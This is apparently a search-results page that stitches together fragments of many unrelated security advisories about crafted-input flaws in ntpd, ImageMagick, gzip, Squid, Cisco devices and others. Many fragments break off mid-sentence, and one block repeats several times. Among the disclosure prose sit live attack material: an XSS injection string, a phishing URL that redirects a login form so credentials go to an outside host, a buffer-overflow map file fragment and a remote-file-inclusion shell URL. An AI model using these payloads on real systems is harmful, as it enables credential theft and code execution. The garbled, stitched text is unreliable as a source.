Next Page >>
specially/crafted
this advisory.
A buffer overflow flaw was discovered in the ntpd daemon's NTPv4
authentication code. If ntpd was configured to use public key
cryptography for NTP packet authentication, a remote attacker could
use this flaw to send a specially-crafted request packet that could
crash ntpd or, potentially, execute arbitrary code with the
privileges of the "ntp" user.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1252 to this issue.
local users to gain privileges via a Trojan horse configuration file
in the current working directory (CVE-2010-4167).
A flaw was found in the way ImageMagick processed images with malformed
Exchangeable image file format (Exif) metadata. An attacker could
create a specially-crafted image file that, when opened by a victim,
would cause ImageMagick to crash or, potentially, execute arbitrary
code (CVE-2012-0247).
A denial of service flaw was found in the way ImageMagick processed
images with malformed Exif metadata. An attacker could create a
Multiple vulnerabilities has been found and corrected in imagemagick:
A flaw was found in the way ImageMagick processed images with malformed
Exchangeable image file format (Exif) metadata. An attacker could
create a specially-crafted image file that, when opened by a victim,
would cause ImageMagick to crash or, potentially, execute arbitrary
code (CVE-2012-0247).
A denial of service flaw was found in the way ImageMagick processed
images with malformed Exif metadata. An attacker could create a
III. ANALYSIS
Exploitation could allow attackers to execute arbitrary code on the
targeted host under the privileges of the current logged-on user.
Successful exploitation would require the attacker to entice his or her
victim into viewing a specially-crafted thumbnail leveraging the
vulnerability. <BR><BR> Some vectors of attack include e-mail, the
browser and network shares. In an e-mail-based attack, the attacker
must entice his or her victim into opening or previewing a
specially-crafted Office document containing a specially-crafted
thumbnail. In a browser-based attack, the victim must simply view a
The injected payload in the previous examples is:
"><script>alert("XSS")</script><a b="
The following specially-crafted URL performs an advanced XSS phishing
attack. After the victim enters his/her username and passcode, the
credentials are forwarded to a third-party site (procheckup.com in this
case) and logged by the attacker:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere
Messenger. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'retryURL' parameter.
An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a PGP Universal Web Messenger specially-crafted URL is visited.
Vulnerable server-side script: '/b/lnj.e?'
Unfiltered parameter: 'retryURL'
Proof of concept
The injected payload in the previous examples is:
"><script>alert("XSS")</script><a b="
The following specially-crafted URL performs an advanced XSS phishing
attack. After the victim enters his/her username and passcode, the
credentials are forwarded to a third-party site (procheckup.com in this
case) and logged by the attacker:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere
Agent. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'url' parameter.
An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a RSA Authentication Agent specially-crafted URL is visited.
Although the 'url' parameter is filtered for protocol URLs such as
'http://' and 'https://', is NOT filtered for other protocols such as
FTP or Gopher. An attacker could upload a spoof login page to a FTP
server that allows anonymous connections where the victim would be
The injected payload in the previous examples is:
"><script>alert("XSS")</script><a b="
The following specially-crafted URL performs an advanced XSS phishing
attack. After the victim enters his/her username and passcode, the
credentials are forwarded to a third-party site (procheckup.com in this
case) and logged by the attacker:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere
Agent. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'url' parameter.
An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a RSA Authentication Agent specially-crafted URL is visited.
Although the 'url' parameter is filtered for protocol URLs such as
'http://' and 'https://', is NOT filtered for other protocols such as
FTP or Gopher. An attacker could upload a spoof login page to a FTP
server that allows anonymous connections where the victim would be
Multiple vulnerabilities has been found and corrected in gzip:
A missing input sanitation flaw was found in the way gzip used to
decompress data blocks for dynamic Huffman codes. A remote attacker
could provide a specially-crafted gzip compressed data archive,
which once opened by a local, unsuspecting user would lead to denial
of service (gzip crash) or, potentially, to arbitrary code execution
with the privileges of the user running gzip (CVE-2009-2624).
An integer underflow leading to array index error was found in the
_______________________________________________________________________
Problem Description:
A heap-based buffer overflow vulnerability was found in how ImageMagick
parsed XCF files. If ImageMagick opened a specially-crafted XCF
file, it could be made to overwrite heap memory beyond the bounds
of its allocated memory, potentially allowing an attacker to execute
arbitrary code on the system running ImageMagick (CVE-2008-1096).
Another heap-based buffer overflow vulnerability was found in how
widgets, checkboxes, radio buttons, labels, plain text fields,
scrollbars, etc., to text mode user interfaces.
A heap-based buffer overflow flaw was found in the way newt
processes content that is to be displayed in a text dialog box.
A local attacker could issue a specially-crafted text dialog box
display request (direct or via a custom application), leading to a
denial of service (application crash) or, potentially, arbitrary
code execution with the privileges of the user running the
application using the newt library.
Problem Description:
Multiple vulnerabilities has been found and corrected in libvorbis:
A specially-crafted Ogg Vorbis media format file (Ogg) could cause an
application using libvorbis to crash or, possibly, execute arbitrary
code when opened (CVE-2009-3379).
If a specially-crafted Ogg Vorbis media file was opened by an
application using libvorbis, it could cause the application to crash
It is based on code developed By sinhack research labs:
http://sinhack.net/URLFilteringEvasion/sakeru.tx
Description:
"Fortinet's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that fulfill 3 factors:
1.- HTTP Requests are terminated by the CRLF characters.
2.- Forcing to talk via HTTP/1.0 version so that dont send the host header.
3.- Finally, by Fragmenting the GET or POST requests
necessary changes.
Details follow:
It was discovered that Squid incorrectly handled certain auth headers. A
remote attacker could exploit this with a specially-crafted auth header
and cause Squid to go into an infinite loop, resulting in a denial of
service. This issue only affected Ubuntu 8.10, 9.04 and 9.10.
(CVE-2009-2855)
It was discovered that Squid incorrectly handled certain DNS packets. A
The injected payload in the previous examples is:
"><script>alert("XSS")</script><a b="
The following specially-crafted URL performs an advanced XSS phishing
attack. After the victim enters his/her username and passcode, the
credentials are forwarded to a third-party site (procheckup.com in this
case) and logged by the attacker:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere
map file. The third variable, "mapserv->Id", is read from user input
at line 406, though it is restricted to IDSIZE (128) bytes. Thus, a
buffer overflow can be achieved by creating a map file on the server
with overly long IMAGEPATH and/or NAME attributes; their values will be
stored past the end of "buffer" and will overwrite saved register
values. If the following specially-crafted map file ("bof.map") is
stored on the server (either by creating it directly, or tricking a
legitimate user into placing it onto the file system):
MAP
NAME {"A" x 1072}GGGG
3. *Vulnerability Description*
Microsoft Publisher is a desktop publishing application from Microsoft
that uses a proprietary file format (.pub). A vulnerability has been
found in Publisher 2007, that can be leveraged by an attacker to
execute arbitrary code by enticing users to insert a specially-crafted
.pub file into a document.
4. *Vulnerable packages*
Release mode: Coordinated release
Discovered by: Daniel King, SecureWorks
Summary
Cisco Adaptive Security Appliance (ASA) is vulnerable to HTTP response splitting caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim’s web browser within the security context of the Adaptive Security Appliance site.
Affected Products
Cisco ASA version 8.1(1) and earlier.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988
Description:
Previous versions of the ImageMagick package are vulnerable to multiple
attacks whereby an attacker might be able to execute arbitrary code by
coercing the user into opening specially-crafted files with ImageMagick.
- ---
Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
(optional) TLS protection on client-server connections, by relying on
a certificate from a trusted CA which contains an embedded NUL byte in
the Common Name (CVE-2009-4034).
Authenticated database users could elevate their privileges by
creating specially-crafted index functions (CVE-2009-4136).
The following table shows fixed source package versions for the
respective distributions.
oldstable/etch stable/lenny testing/unstable
A vulnerability has been discovered and corrected in freetype2:
Multiple stack overflow flaws have been reported in the way FreeType
font rendering engine processed certain CFF opcodes. An attacker
could use these flaws to create a specially-crafted font file that,
when opened, would cause an application linked against libfreetype
to crash, or, possibly execute arbitrary code (CVE-2010-1797).
Packages for 2008.0 and 2009.0 are provided as of the Extended
Maintenance Program. Please visit this link to learn more:
Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
Puntal 2.1.0 is vulnerable; other versions may also be affected.
An attacker can exploit these issues via a browser.
-=[P0C]=-
http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
or
A remote attacker could trick a user to perform a set of UI actions
that trigger a possibly exploitable crash, leading to execution of
arbitrary code or a Denial of Service.
It was also possible for an attacker to entice a user to visit a
specially-crafted web page that would trigger one of the
vulnerabilities, leading to execution of arbitrary code within the
confines of the sandbox, successful Cross-Site Scripting attacks,
violation of the same-origin policy, successful website spoofing
attacks, information leak, or a Denial of Service. An attacker could
also trick a user to perform a set of UI actions that might result in a
from within the file system, resulting in heap-based buffer overflows.
Impact
======
An attacker could entice a user to process a specially-crafted ext2 or
ext3 file system image (with tools linking against libext2fs, e.g.
fsck, forensic tools or Xen's pygrub), possibly resulting in the
execution of arbitrary code with the privileges of the user running the
application.
Problem Description:
An XML External Entity expansion flaw was found in the way Raptor
processed RDF files. If an application linked against Raptor were to
open a specially-crafted RDF file, it could possibly allow a remote
attacker to obtain a copy of an arbitrary local file that the user
running the application had access to. A bug in the way Raptor handled
external entities could cause that application to crash or, possibly,
execute arbitrary code with the privileges of the user running the
application (CVE-2012-0037).
call to the substring function for a bit string, related to an
overflow. (CVE-2010-0442).
A flaw was found in the way the PostgreSQL server process
enforced permission checks on scripts written in PL/Perl. A remote,
authenticated user, running a specially-crafted PL/Perl script, could
use this flaw to bypass PL/Perl trusted mode restrictions, allowing
them to obtain sensitive information; execute arbitrary Perl scripts;
or cause a denial of service (remove protected, sensitive data)
(CVE-2010-1169).
* DNS Response Parsing Overflow
Cisco Unified IP Phone 7940, 7940G, 7960 and 7960G devices
running SCCP and SIP firmware contain a buffer overflow
vulnerability in the handling of DNS responses. A
specially-crafted DNS response may be able to trigger a buffer
overflow and execute arbitrary code on a vulnerable phone. This
vulnerability is corrected in SCCP firmware version 8.0(8) and
SIP firmware version 8.8(0). This vulnerability is documented in
CVE-2008-0530 leavingcisco.com and Cisco Bug IDs CSCsj74818 and
CSCsk21863.
A heap-based buffer overflow flaw was found in the way AFM font file
parser, used for rendering of DVI files, in GNOME evince document
viewer and other products, processed line tokens from the given input
stream. A remote attacker could provide a DVI file, with embedded
specially-crafted font file, and trick the local user to open it with
an application using the AFM font parser, leading to that particular
application crash or, potentially, arbitrary code execution with the
privileges of the user running the application. Different vulnerability
than CVE-2010-2642 (CVE-2011-0433).
Next Page>>
|
